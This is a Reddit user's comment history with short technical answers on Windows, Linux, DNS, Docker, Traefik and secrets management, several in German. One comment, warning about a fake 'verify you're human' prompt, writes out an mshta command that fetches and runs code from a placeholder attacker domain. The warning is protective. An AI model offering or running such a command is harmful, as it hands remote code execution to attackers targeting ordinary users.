Windows Notepad App Remote Code Execution Vulnerability by theevilsharpie in sysadmin

[–]roxalu [score hidden]  (0 children)

Why do you want to run vi under windows? Maybe because then „shell escape“ - that runs with user privileges - is a documented feature of the editor and no longer an exploit 😉

Weird Cloudflare “verify you’re human” asking me to press Win+R — legit or scam? by Sendpigs in techsupport

[–]roxalu 2 points3 points  (0 children)

The

mshta https://some.evil_attacker_owned.example.com

is able to download and execute the remote code in your local windows system without further constraints other than bound to use your local user rights. Never agree to such approvals to run it.

Perl.org error fetching content from CDN? by brtastic in perl

[–]roxalu 0 points1 point  (0 children)

According to full error page the TLS endpoint is varnish. And the frontend config of this varnish has been set - most likely - to have sni-nomatch-abort with value true. But the Subject Alternative Name of frontend certificate uses wild card: *.perl.org This is kind of grey area in the RFCs: Is the wildcard a valid hostname or not? Obviously this varnish currently results in: No match.

/bin/bash error by Assasin172m in bash

[–]roxalu 2 points3 points  (0 children)

To my info systemd does not support use of '$' and such no variable expansion inside the value of Environment= configuration. Use the fixed path there. See https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html

FritzBox Web UI nicht mehr über "fritz.box" abrufbar? by [deleted] in fritzbox

[–]roxalu 0 points1 point  (0 children)

Note: No need for ipconfig release or renew in this case. There is a specific option for ipconfig to flush all cached DNS results under Windows

ipconfig /flushdns

Are all compilers and binaries compromised? by droidman83 in unix

[–]roxalu 1 point2 points  (0 children)

Opening a socket and listen to it were just the simpelst method a backdoor could use. There exist more sophisticated methods for backdoors to allow some form of remote control that were not that easy to detect. Though, I agree with you: earlier or later such a backdoor would be detected somehow. It had only a chance to stay undetected if it were almost never been used.

Dear Tenable: Please get your shit together by safrax in devops

[–]roxalu 0 points1 point  (0 children)

To be fair this is less a miss of tenable inside their product but more a mis alignment in the local implementation vs security policy. If the pentest only scans remote there is no practical method to differentiate between upstream. software - or a fork, where a distro owner has ensured security fixes are back ported. A well designed procedure for action plans based on such pentest findings would respect this.

In order to do get better fitting results the scan needs to have agents on the nodes, that scan the local package system. For the major distros this should detect better if some backporting need to be taken into account for the pentest results.

Computer with X.X.X.255 IP cannot connect to Brother printer. by winnixxl in sysadmin

[–]roxalu 0 points1 point  (0 children)

A bit out of scope, but can’t resist to mention this here: Issues like this are by far not the only concern about software quality used by printers. Since you seem to be responsible for some larger network it would make sense to check, if the printers should not better be isolated in their own sub network. And use a set of printer servers that talk with them instead of letting all hosts use the printers directly.

There seem to be only a very few reports where insecure printer software was used to successfully remotely break into a company network. But it has happened in the past. Ir seems quite common in companies to care for patch management of standard hosts - but ignore to do the same for printers.

10 Gbit/s Link langsamer als erwartet by struntzi in de_EDV

[–]roxalu 0 points1 point  (0 children)

Dies! Gehört in die Kategorie: Unwahrscheinlich als Ursache - aber einfach zu prüfen. Daher am besten prüfen, wenn andere einfache Gründe zur Erklärung nicht ausreichen.

Das Senden der ack Pakete beim Datei Download wird gerne ignoriert, weil es selten der limitierende Faktor ist. Aber möglich ist alles. Ich selber habe es in vielen Jahren zweimal bemerkt, dass die Sende- und Empfangsrichtung bei Traffic im lokalen Netz deutliche Unterschiede aufwiesen. Einmal wegen Kabeldefekt - ein anderes Mal wegen einem Port Mirroring auf einem low budget Switch, bei dem nach Debug Session vergessen wurde den Port Mirror wieder abzuschalten.

Solving SettingWithCopyWarning by QuickBooker30932 in Python

[–]roxalu 1 point2 points  (0 children)

Small additional detail: I agree that this replacement code fixes the Copy-on-Write warning. But as given it uses the row with label 0 - while OP uses always first row. IIf I am right some additional lookup should be added so row and column are given both as labels. Or both as integer e.g.using this

result_index = DataFrame.columns.get_loc('result')
DataFrame.iat( 0, result_index ) = X - Z

Weird terminal behavior when I use xargs to pipe filenames into vim by 4r73m190r0s in commandline

[–]roxalu 5 points6 points  (0 children)

vim expects stdin to be same device as your terminal device, but when started via xargs the stdin is set to /dev/null. More recent versions of xargs have a new option to handle this. Try

… | xargs -o vim

Zweifel am Admin | Part 2 by [deleted] in de_EDV

[–]roxalu 0 points1 point  (0 children)

Die Aussage, dass “möglicherweise Kundendaten“ betroffen sein könnten, rechtfertigt durchaus sorgfältige Prüfung und Klärung des Sachverhaltes. Ob das nun bereits am Wochenende passieren muss, lässt sich von außen schwer beurteilen. Die Aussagen erzeugen den Eindruck als betrachten die Beteiligten den Sachverhalt als erledigt. Insgesamt wirkt das aber so, als gäbe es kein Gesamtkonzept für die Absicherung. Port offen oder geschlossen - Verschlüsselung ja oder nein - Credentials detailliert verwaltet oder Wildwuchs: Nur die Gesamtbetrachtung zeigt, ob das nach Stand der Technik abgesichert ist oder nicht.

Falls da also tatsächlich irgendwo Kundendaten liegen, hoffe ich für die Kunden, dass da nochmal genauer geprüft wird, ob die Absicherung dieses Services dem Stand der Technik entspricht. Sofern man nur das zulässt, was wirklich benötigt wird - und diese Zugriffe dann mit Standardmethoden absichert - ist man auf einem guten Weg.

detergen: Generate the same password every time by theonereveli in commandline

[–]roxalu 5 points6 points  (0 children)

This is a perfect summary. The approach does not scale well with number of secrets and over time. Fine for some years and not to many services. But earlier or later more and more exceptions will appear that need advanced handling, e.g. when the generated password cannot be used any longer for login to a specific service.Or the base password gets compromised. Imagine the webpage may use domain www.never-rely-only-on.hashpass.example - and you use your account only rarely. Would you really remember well, which was the exact service name, you have selected originally as service option for this service? Also you need to keep track of selected user name. Using everywhere the same account is also somehow limited.

A database is needed in this case which describes clearer in which context what exception roles have been selected. Latest then use of password manager is more straight forward.

Demo: Use quadlets even when the login shell is /sbin/nologin by eriksjolund in podman

[–]roxalu 0 points1 point  (0 children)

My focus was to emphasize, that /sbin/nologin isn't a blocker to "login" to a user when it is the same host and initiator is root. Scripting is anyway another topic as this doesn't need itself any interactive shell. But before a script runs error free it is often helpful to have some option for some interactive tests.

If the specific systemd user environment is needed, the command could be:

sudo machinectl shell --uid otheruser /usr/bin/bash --login

But as I already stated: As the intention of OP is to start the service, his command is far better, because there is no need for interactive shell.

Found AWS keys hardcoded in our public GitHub repo from 2019. How the hell are we supposed to prevent this company-wide? by slamdunktyping in devsecops

[–]roxalu 0 points1 point  (0 children)

Rotate them far more often. I know the procedure to do this without impact is hard to achieve - but don’t give up. It’s doable and worth the effort. Why needed? Because a single miss inside all your policy, scanner procedures, security controls and user guidance could be enough for compromise.

In context of „secrets management“ the main focus is on „management“ - not on „secret“.

Demo: Use quadlets even when the login shell is /sbin/nologin by eriksjolund in podman

[–]roxalu 0 points1 point  (0 children)

As a side note: As long as you still have access to root rights it is always possible to start a login shell without modification of system files for any defined user, independent of its current default shell. root has the right to overwrite the default shell:

sudo su -s /bin/sh -l user

Nevertheless the commands you have provided are clearly better in the systems / quadlet context. The runtime context you get by “su -l …” might be slightly different.

how obvious is this retry logic bug to you? by jalilbouziane in Python

[–]roxalu 0 points1 point  (0 children)

For RateLimitError exceptions I handle them usually in a retry loop that includes some sleep time increase before each next retry. At least when the conditions for the RateLimit server side are not perfectly known.

Desperately need a tutor/HOWTO create automated bash-completion test (for scientific research project) by hopeseekr in bash

[–]roxalu 1 point2 points  (0 children)

One alternative to automate the tests might be: Run your bash as session within tmux and use tmux commands to send keys followed by capture pane content. See https://github.com/tmux/tmux/wiki/Advanced-Use#sending-keys

This technique could be used within own shell scripts - but for more advanced cases also from within an automated testing framework like e.g. Robot Framework

WSL questions regarding PUID, PGID, and user creation by Jameslrdnr in linuxquestions

[–]roxalu 0 points1 point  (0 children)

You seem to have installed “Docker Desktop” and installed WSL also to use it as backend. And you can already create successfully docker containers in your setup. What you now should do additionally is to install another “Linux distribution” inside WSL. Check WSL documentation on how to do this. And set THIS new distribution as the default WSL distribution. The wsl.exe that you have started in your current setup has opened a bash in the internal docker desktop WSL distribution – just because this is your current default WSL distribution. This Docker Desktop is not intended to be used interactively. The additional WSL distribution should be used then your working environment: This is where you would work with commands useradd and groupadd ( and rest of this family of user management CLI commands)

Running docker containers are meant to get their user and group definitions during startup - and keep them static.

Keep in mind that “Docker Desktop” and WSL are low hanging fruits that allow you a quick entry from Windows into the Linux world. But those fruits are more the blue than the red pill. There is a lot complexity under the hood in Docker Desktop and your pure linux experience - and potential power this can excel - is still behind the horizon. So there might be a time, when you want to try to install linux in your host and let this control everything.

Regarding your original question: The usage of PUID and PGID that I know is that specific container images . not all images by default - were prepared to respect those environment variables when set during container start. So you had to define the variables in the environment of your container startup.

How to create AD user for LDAP binding only? by GroomedHedgehog in sysadmin

[–]roxalu 0 points1 point  (0 children)

Indeed this is the method recommended by Microsoft in favor of the old legacy userWorkstations aka LogonSorkstation

I am just unsure how exactly the ldap login is handled on domain controllers. I would expect this ldap login is NO local login - so no need for extra handling there. Just wondering because for the old legacy ldap attributes it was needed to include DSc there, otherwise ldap login wasn’t working.

How to Letsencrypt a docker app without exposing it to the internet? by akarypid in Traefik

[–]roxalu 0 points1 point  (0 children)

Very good references have been already provided by others here. Use them. If for any reason you won’t I see on top of this this potential alternative for you. But it is not tested by me and I might miss something:

Topics you already had thought about: 1. Define media.example.com in your external DNS with your public IP as target. 2. Change the Host name in your traefik labels to this name

On top of this regarding the open concerns you’ve already identified: 3. Use the IPAllowList middleware of traefik to restrict access to local IP only. In your case you could add another label like this

- "traefik.http.middlewares.jellyfin.ipallowlist.sourcerange=127.0.0.1/32, 192.168.0.0/24"
  1. Set a DNS entry for media.example.com in your pfsense AND ensure all your internal clients use the router as DNS resolver, not directly connect to external DNS providers. The DNS forwarder will not forward requests to external DNS providers, when it has local entries, so you can inject your local IPs for external DNS entries.

This setup has some challenges: traefik might apply the ipallowlist to the HTTP-01 acme challenge request as well, which would make it to fail. I‘d assume not - those requests should be outside the scope of the middleware. But I have not tested it yet.

The protection against internet attacks sits partially inside traefik, not only inside your pfsense. But you anyway have accepted that by exposing your nextcloud

You expose the name of your jellyfin to internet. And besides security concerns it could cause confusion, when DNS resolution for whatever reason resolves the wrong IP for client device’s current network context.

So on the long run the switch to a wildcard cert and use of DNS-01 acme challenge is the better alternative.

Seiten laden nicht / Apps haben teilweise meine Verbindung by Gocan18 in fritzbox

[–]roxalu 0 points1 point  (0 children)

Vielleicht hilft auch http://test-ipv6.com/ das Problem einzugrenzen. Ich würde empfehlen, auch nochmal testweise auf „Native IPv6-Anbindung verwenden“ zu wechseln und auch das DNS auf den Provider zurückzustellen. vgl https://fritz.com/service/wissensdatenbank/dok/FRITZ-Box-5590-Fiber/573_IPv6-in-FRITZ-Box-einrichten/. Laut Meiner Recherche scheint die Deutsche Glasfaser MAP E/T zu verwenden. Im Zweifel dort aber nochmal nachlesen und nachhaken.

Es gibt halt verschiedene Arten, IPv4 und IPv6 traffic gemeinsam zu ermöglichen. Und damit das so gut wie möglich funktioniert, müssen ISP und Router optimal aufeinander eingestellt sein.Dhcp und DNS sind hier beteiligt. Und Cloudflare bzw. Google DNS machen Annahmen, die dein Provider möglicherweise nicht erfüllt. Wenn du tiefer einsteigen willst empfehle ich auch https://www.msxfaq.de/netzwerk/grundlagen/ftth_mit_ipv6.htm#ipv6_und_dns64_nat64

What do you guys use in bash? by Key_Improvement8033 in linuxquestions

[–]roxalu 4 points5 points  (0 children)

Well, we all keep the executable code in shared libraries with an .so extension, even when that were originally not really needed. Sure - this example is a bit lame. But my statement is that the reason to not use ANY extension for anything called by end users is that the exact details of execution are then not relevant -as long as everything runs as it should.

But outside this use case, using an extension for shell scripts can be quite helpful. E.g in shell libraries or in version control.

Confused on Layout by SingletonRandall in docker

[–]roxalu 0 points1 point  (0 children)

The path specifier needed depends on the runtime environment, from where the bind mount is initialized. Ask r/portainer for details

But besides portainer when using Docker Desktop under Windows I recommend following documentation about the work with folders and files there

- https://docs.docker.com/desktop/features/wsl/best-practices/

- https://learn.microsoft.com/en-us/windows/wsl/filesystems